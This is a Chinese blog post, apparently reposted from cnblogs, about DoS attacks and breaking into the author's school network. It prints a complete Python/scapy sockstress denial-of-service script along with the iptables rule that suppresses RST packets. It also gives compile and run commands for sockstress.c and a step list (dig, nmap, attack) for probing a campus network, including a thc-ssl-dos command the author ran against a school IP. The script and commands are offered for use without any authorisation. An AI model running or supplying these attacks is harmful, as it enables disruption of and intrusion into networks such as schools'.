Dos攻击和校网渗透
为了证明我还活着,话不多说
Dos攻击脚本(这是一个sockstrees Dos脚本)
1 #-*- coding:utf-8 -*-
2 from scapy.all import *
3 from time import sleep
4 import thread
5 import logging
6 import os
7 import signal
8 import sys
9
10 from scapy.layers.inet import IP,TCP
11
12 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
13
14 if len(sys.argv) != 4:
15 print("用法: ./sock_stress.py [目标IP] [端口] [线程数]")
16 print("举例: ./scok_stress.py [1.1.1.1] 20 ##攻击端口处于开放状态")
17 sys.exit()
18
19 target = str(sys.argv[1])
20 dstport = int(sys.argv[2])
21 threads = int(sys.argv[3])
22
23 ##攻击函数
24 def sock_stress(target,dstport):
25 while 0 == 0:
26 try:
27 x = random.randint(0,65535)
28 response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags='S'),timeout=1,verboss=0)
29 send(IP(dst=target)/TCP(dport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq+1))/'\x00\x00',verboss=0)
30 except:
31 pass
32 ##停止攻击函数
33 def shutdown(signal,frame):
34 print("正在恢复 ipables 规则")
35 os.system('iptables -D OUTPUT -p tcp --tcp-flags RST -d' + target +' -j DROP')
36 sys.exit()
37
38 ##添加iptables规则
39
40 os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
41 signal.signal(signal.SIGINT,shutdown)
42
43 ##多线程攻击
44 print("\n攻击正在进行...按 Ctrl+C 停止攻击")
45 for x in range(0,threads):
46 thread.start_new_thread(sock_stress,(target,dstport))
47
48 ##永远执行
49 while 0==0:
50 sleep(1)View Code
一、./sockstrees(产看使用方法)
二、./sockstress.py [ip] [port] 200
三、iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP(手动添加ip)
四、iptables -L (查看增添的ip)
------------------------------------------------------------------------------------------------
关于大神的攻击程序sockstress.c
一、安装:gcc -Wall -c sockstress.c
编译:gcc -pthread -o sockstress sockstress.o
二、指令:./sockstress [ip]:[port] eth0 10
(特别好用)
------------------------------------------------------------------------------------------------
关于校网渗透
一、dig 学校域名
二、nmap -v [ip](准备已知的所有ip,逐个分析)
三、尝试开放端口
四、尝试攻击
(我尝试攻击指令:thc-ssl-dos 172.18.36.254 80 --accpet 这是关于TCP的握手资源的攻击,可惜我的第一次攻击失败。。。)
个人网站:http://www.tonyplot.xyz
转载于:https://www.cnblogs.com/money131/p/11122326.html
Dos攻击和校网渗透相关推荐
- 内网渗透测试:NTLM Relay攻击分析
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...
- windows内网渗透PTH/PTK攻击
前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass th ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- Windows 内网渗透之攻击域控
文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...
- 内网渗透之PPT票据传递攻击(Pass the Ticket)
文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...
- Linux kali内网渗透之ARP断网攻击
Linux kali内网渗透之ARP断网攻击 ARP断网攻击 如果你的kali是虚拟机 ,请将其设置为网络桥接模式,这样才和内网在同一网段 如果你的kali里没有安装arpspoof,请在终端输入如下 ...
- CVE-2018-8174漏洞复现及内网渗透攻击
文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...
- 内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
最新文章
- squid代理(传统代理)
- ESP8266编译脚本之四
- boost::statechart模块实现使用正交状态和 state_downcast 查询正交区域的状态的测试程序
- MDN文档基础知识搜集
- 盐噪声和胡椒噪声的区别_为什么加一点盐对您的密码很有用(但不包括胡椒粉!)
- java 位运算取8位_Java 9 AOT 试用:仅支持 64 位 Linux和java.base 模块编译
- 因为有人说的WZ132
- 一个机房的所有计算机联成的网络应是,根据分布范围,一个机房的所有计算机联成的网络应是( )。...
- python中property干什么用的?
- 网页上的播放器相关参数说明
- 宽带拨号上服务器无响应,宽带拨号服务器无响应(图文)
- 2019.07.23--运用三W法则初步学习SpringCloud基础知识
- python排版_Python|图形排版
- 浩哥的Linux学习笔记之touch命令
- 云计算工程师面试题集锦,常见云计算面试题及答案
- 多元正态分布的后验采样
- C/C++基础 sleep()、usleep()、nanosleep()的用法
- setting中的各种设置
- AAA学习-本地local
- Google Earth Engine(GEE)——User memory limit exceeded(2)